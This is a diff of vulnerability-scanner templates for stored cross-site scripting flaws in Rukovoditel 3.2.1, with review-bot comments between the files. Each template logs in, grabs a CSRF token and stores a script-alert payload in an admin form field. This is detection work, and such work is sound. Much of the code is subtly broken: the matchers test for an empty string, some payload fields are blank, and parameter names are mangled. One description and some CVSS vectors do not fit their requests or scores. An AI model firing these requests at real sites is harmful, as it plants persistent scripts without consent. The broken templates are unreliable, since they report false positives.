+++ b/http/cves/2022/CVE-2022-43170.yaml @@ -0,0 +1,60 @@ +id: CVE-2022-43170 + +info: + name: Rukovoditel <= 3.2.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross-site scripting (XSS) vulnerability in the Dashboard Configuration feature (index.php?module=dashboard_configure/index) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title parameter after clicking "Add info block". + reference: + - https://github.com/anhdq201/rukovoditel/issues/6 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-43170 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-43170 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=dashboard_configure/index&action=save&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&type=info_block&is_active=1§ions_id=0&color=default&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&icon=&description=&sort_order= + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true 
diff --git a/http/cves/2022/CVE-2022-43185.yaml b/http/cves/2022/CVE-2022-43185.yaml new file mode 100644 index 0000000000..7c5d638e81 --- /dev/null +++ b/http/cves/2022/CVE-2022-43185.yaml @@ -0,0 +1,59 @@ +id: CVE-2022-43185 + +info: + name: Rukovoditel <= 3.2.1 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross-site scripting (XSS) vulnerability in the Global Lists feature (/index.php?module=global_lists/lists) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking "Add". + reference: + - https://github.com/anhdq201/rukovoditel/issues/1 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-43185 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-43185 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=holidays/holidays&action=save&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_date=2023-05-22&end_date=2023-05-31 + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + internal: true + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' 
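Review bot: The description says the bug is in the Global Lists feature at `/index.php?module=global_lists/lists`, but the third request posts to `module=holidays/holidays&action=save` with `start_date`/`end_date` fields; the description appears to have been carried over from CVE-2022-43164.yaml and should describe the Holidays name field this request actually exercises, confirmed against the issue #1 reference. The hard-coded `start_date=2023-05-22&end_date=2023-05-31` are fine as sample values, but a comment such as `# arbitrary date range; presumably both fields are required by the form` would explain why they are there.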
diff --git a/http/cves/2022/CVE-2022-44944.yaml b/http/cves/2022/CVE-2022-44944.yaml new file mode 100644 index 0000000000..cdde910d64 --- /dev/null +++ b/http/cves/2022/CVE-2022-44944.yaml 
@@ -0,0 +1,61 @@ +id: CVE-2022-44944 + +info: + name: Rukovoditel <= 3.2.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add Announcement function at /index.php?module=help_pages/pages&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field. + reference: + - https://github.com/anhdq201/rukovoditel/issues/14 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-44944 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-44944 + cwe-id: CWE-79 + metadata: + verified: true + shodan-query: http.favicon.hash:-1499940355 + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=help_pages/pages&action=save&entities_id=24&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&type=announcement&is_active=1&color=default&icon=&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&description=&start_date=&end_date=&sort_order= + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true 
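Review bot: The query string and description hard-code `entities_id=24`; entity ids are assigned per installation, so on a target where the help-pages entity has a different id the save request is sent against the wrong entity and the template quietly fails to match even though the issue is present. The value comes from the referenced issue, so keeping it is defensible, but it should be called out in the description, e.g. `entities_id=24 matches the reporter's installation; adjust for other deployments.` The same applies to CVE-2022-44946.yaml, and CVE-2022-44947.yaml additionally hard-codes `fields_id=193&fields_values%5B%5D=67`.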
diff --git a/http/cves/2022/CVE-2022-44946.yaml b/http/cves/2022/CVE-2022-44946.yaml new file mode 100644 index 0000000000..20e40fab41 --- /dev/null +++ b/http/cves/2022/CVE-2022-44946.yaml 
@@ -0,0 +1,61 @@ +id: CVE-2022-44946 + +info: + name: Rukovoditel <= 3.2.1 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add Page function at /index.php?module=help_pages/pages&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field. + reference: + - https://github.com/anhdq201/rukovoditel/issues/15 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-44946 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-44946 + cwe-id: CWE-79 + metadata: + verified: true + shodan-query: http.favicon.hash:-1499940355 + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=help_pages/pages&action=save&entities_id=24&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&type=page&is_active=1&position=listing&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=&description= + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + internal: true + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' 
diff --git a/http/cves/2022/CVE-2022-44947.yaml b/http/cves/2022/CVE-2022-44947.yaml new file mode 100644 index 0000000000..0b0bce72f2 --- /dev/null +++ b/http/cves/2022/CVE-2022-44947.yaml 
@@ -0,0 +1,61 @@ +id: CVE-2022-44947 + +info: + name: Rukovoditel <= 3.2.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Highlight Row feature at /index.php?module=entities/listing_types&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Note field after clicking "Add". + reference: + - https://github.com/anhdq201/rukovoditel/issues/13 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-44947 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-44947 + cwe-id: CWE-79 + metadata: + verified: true + shodan-query: http.favicon.hash:-1499940355 + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=entities/listing_highlight&action=save&entities_id=24&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&is_active=1&fields_id=193&fields_values%5B%5D=67&bg_color=&sort_order=¬es=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true 
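Review bot: The save request body reads `¬es=%3Cscript%3E...` where the description says the payload goes into the Note field; this looks like `&notes=` with `&not` decoded to `¬` by the renderer, but if the committed file really contains `¬es` the payload is sent under a parameter the application ignores and the matcher can never fire. Please confirm the file has the literal bytes `&notes=`. `fields_id=193` and `fields_values[]=67` are instance-specific ids from the PoC; on an install without those ids the highlight rule is likely rejected, so hedge them in the description or explain how they were chosen. As with the sibling templates, the created highlight rule persists with the script in its note and there is no cleanup request.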
diff --git a/http/cves/2022/CVE-2022-44948.yaml b/http/cves/2022/CVE-2022-44948.yaml new file mode 100644 index 0000000000..a57e89e948 --- /dev/null +++ b/http/cves/2022/CVE-2022-44948.yaml @@ -0,0 +1,59 @@ +id: CVE-2022-44948 + +info: + name: Rukovoditel <= 3.2.1 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Entities Group feature at/index.php?module=entities/entities_groups. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field after clicking "Add". + reference: + - https://github.com/anhdq201/rukovoditel/issues/8 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-44948 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-44948 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2022,rukovoditel,xss,stored-xss,authenticated +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=entities/entities_groups&action=save&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0 + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + internal: true + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' 
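Review bot: The entity group created by the `entities/entities_groups&action=save` request persists with `<script>` as its name and the template has no cleanup, so a scanned instance keeps a stored-XSS payload in its entity-group list; say so in `description` or add a delete request. Unlike the other Rukovoditel templates in this change, there is no blank line between `tags:` and `http:` and `metadata` carries no `shodan-query`; for consistency add `shodan-query: http.favicon.hash:-1499940355`, the same product fingerprint the siblings use. The greedy `value="(.*)"` in the nonce extractor should be `value="(.*?)"`.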
diff --git a/http/cves/2022/CVE-2022-44949.yaml b/http/cves/2022/CVE-2022-44949.yaml new file mode 100644 index 0000000000..e489ae03bd --- /dev/null +++ b/http/cves/2022/CVE-2022-44949.yaml 
@@ -0,0 +1,128 @@ +id: CVE-2022-44949 + +info: + name: Rukovoditel <= 3.2.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Field function at /index.php?module=entities/fields&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Short Name field. + reference: + - https://github.com/anhdq201/rukovoditel/issues/12 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-44949 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-44949 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=entities/fields&action=save&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfKx13B5QBU5Sccgf + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="form_session_token" + + {{nonce}} + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="entities_id" + + 24 + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="forms_tabs_id" + + 29 + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="name" + + test + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="short_name" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="type" + + fieldtype_input + 
------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="fields_configuration[width]" + + input-small + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="fields_configuration[default_value]" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="fields_configuration[is_unique]" + + 0 + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="fields_configuration[unique_error_msg]" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="required_message" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="tooltip" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="tooltip_item_page" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="access_template" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="access[5]" + + yes + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="access[4]" + + yes + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="notes" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf-- + + cookie-reuse: true + redirects: true + max-redirects: 3 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2022/CVE-2022-44950.yaml b/http/cves/2022/CVE-2022-44950.yaml new file mode 100644 index 0000000000..4688775a8f --- /dev/null +++ b/http/cves/2022/CVE-2022-44950.yaml 
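Review bot: Unlike the page/listing templates, this request adds a new input field to entity 24 (`entities/fields&action=save` with `type=fieldtype_input`), which appears to be a structural change to the entity that shows up on its forms and persists after the scan; neither the description nor a cleanup request covers that. `forms_tabs_id=29`, `entities_id=24` and the `access[4]`/`access[5]` group ids are values from the PoC instance, so on a different install the save may be rejected or land on another entity; the `verified: true` claim should say which setup it was verified against. `max-redirects: 3` differs from the 2 used by the sibling templates with no visible reason; align it or add a comment explaining the extra hop.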
@@ -0,0 +1,128 @@ +id: CVE-2022-44950 + +info: + name: Rukovoditel <= 3.2.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Field function at /index.php?module=entities/fields&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field. + reference: + - https://github.com/anhdq201/rukovoditel/issues/10 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-44950 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-44950 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=entities/fields&action=save&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfKx13B5QBU5Sccgf + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="form_session_token" + + {{nonce}} + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="entities_id" + + 24 + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="forms_tabs_id" + + 29 + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="name" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="short_name" + + test + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="type" + + fieldtype_input + 
------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="fields_configuration[width]" + + input-small + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="fields_configuration[default_value]" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="fields_configuration[is_unique]" + + 0 + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="fields_configuration[unique_error_msg]" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="required_message" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="tooltip" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="tooltip_item_page" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="access_template" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="access[5]" + + yes + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="access[4]" + + yes + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="notes" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf-- + + cookie-reuse: true + redirects: true + max-redirects: 3 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2022/CVE-2022-44951.yaml b/http/cves/2022/CVE-2022-44951.yaml new file mode 100644 index 0000000000..f6ced50538 --- /dev/null +++ b/http/cves/2022/CVE-2022-44951.yaml 
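Review bot: This request is the CVE-2022-44949 multipart body with the payload moved from `short_name` to `name`, so a full scan creates two persistent fields on entity 24 and nothing removes either; document the side effect in `description`. The nonce extractor `value="(.*)"` is greedy — use `value="(.*?)"`. `metadata` lacks a `max-request` entry while other templates in this change declare one; add `max-request: 3` for the three raw requests.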
@@ -0,0 +1,59 @@ +id: CVE-2022-44951 + +info: + name: Rukovoditel <= 3.2.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Form tab function at /index.php?module=entities/forms&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field. + reference: + - https://github.com/anhdq201/rukovoditel/issues/11 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-44951 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 5.4 + cve-id: CVE-2022-44951 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=entities/forms&action=save_tab&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&entities_id=24&name=%3cscript%3ealert(document.domain)%3c%2fscript%3e&description= + + cookie-reuse: true + redirects: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2022/CVE-2022-44952.yaml b/http/cves/2022/CVE-2022-44952.yaml new file mode 100644 index 0000000000..581ba7e576 --- /dev/null +++ b/http/cves/2022/CVE-2022-44952.yaml 
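Review bot: `cvss-metrics` is `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`, a 9.8 unauthenticated vector, but `cvss-score` is 5.4 and the template logs in before exploiting, so the vector was copied from an unrelated template. Use the vector the other Rukovoditel stored-XSS templates carry, `cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N`, which is what 5.4 corresponds to. `redirects: true` here has no `max-redirects`, unlike the siblings; add `max-redirects: 2`. The form tab created with `<script>` in its name persists on the target and is not cleaned up.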
@@ -0,0 +1,142 @@ +id: CVE-2022-44952 + +info: + name: Rukovoditel <= 3.2.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in /index.php?module=configuration/application. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Copyright Text field after clicking "Add". + reference: + - https://github.com/anhdq201/rukovoditel/issues/9 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-44952 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 5.4 + cve-id: CVE-2022-44952 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=configuration/save&redirect_to=configuration/application HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMh2HSjWbM7zJjWOA + + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="form_session_token" + + {{nonce}} + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_NAME]" + + Test + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_SHORT_NAME]" + + test + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="APP_LOGO"; filename="" + Content-Type: application/octet-stream + + + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_LOGO]" + + + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + 
Content-Disposition: form-data; name="CFG[APP_LOGO_URL]" + + + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="APP_FAVICON"; filename="" + Content-Type: application/octet-stream + + + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_FAVICON]" + + + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_COPYRIGHT_NAME]" + + + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_LANGUAGE]" + + english.php + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_SKIN]" + + + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_TIMEZONE]" + + America/New_York + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_ROWS_PER_PAGE]" + + 10 + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_DATE_FORMAT]" + + m/d/Y + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_DATETIME_FORMAT]" + + m/d/Y H:i + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_NUMBER_FORMAT]" + + 2/./* + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_FIRST_DAY_OF_WEEK]" + + 0 + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[DROP_DOWN_MENU_ON_HOVER]" + + 0 + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[DISABLE_CHECK_FOR_UPDATES]" + + 0 + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA-- + + - | + @timeout: 5s + GET /index.php?module=dashboard/ HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + redirects: true + matchers: + - type: dsl + dsl: + - 'status_code_4 == 200' + - 'contains(content_type_4, "text/html")' + - 'contains(body_4, "")' + - 'contains(body_4, "rukovoditel")' + condition: and + + extractors: + - type: regex + 
name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2023/CVE-2023-0514.yaml b/http/cves/2023/CVE-2023-0514.yaml new file mode 100644 index 0000000000..9cbdadc655 --- /dev/null +++ b/http/cves/2023/CVE-2023-0514.yaml @@ -0,0 +1,46 @@ +id: CVE-2023-0514 + +info: + name: Membership Database <= 1.0 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Membership Database before 1.0 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + reference: + - https://wpscan.com/vulnerability/c6cc400a-9bfb-417d-9206-5582a49d0f05 + - https://wordpress.org/plugins/member-database/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-0514 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-0514 + cwe-id: CWE-79 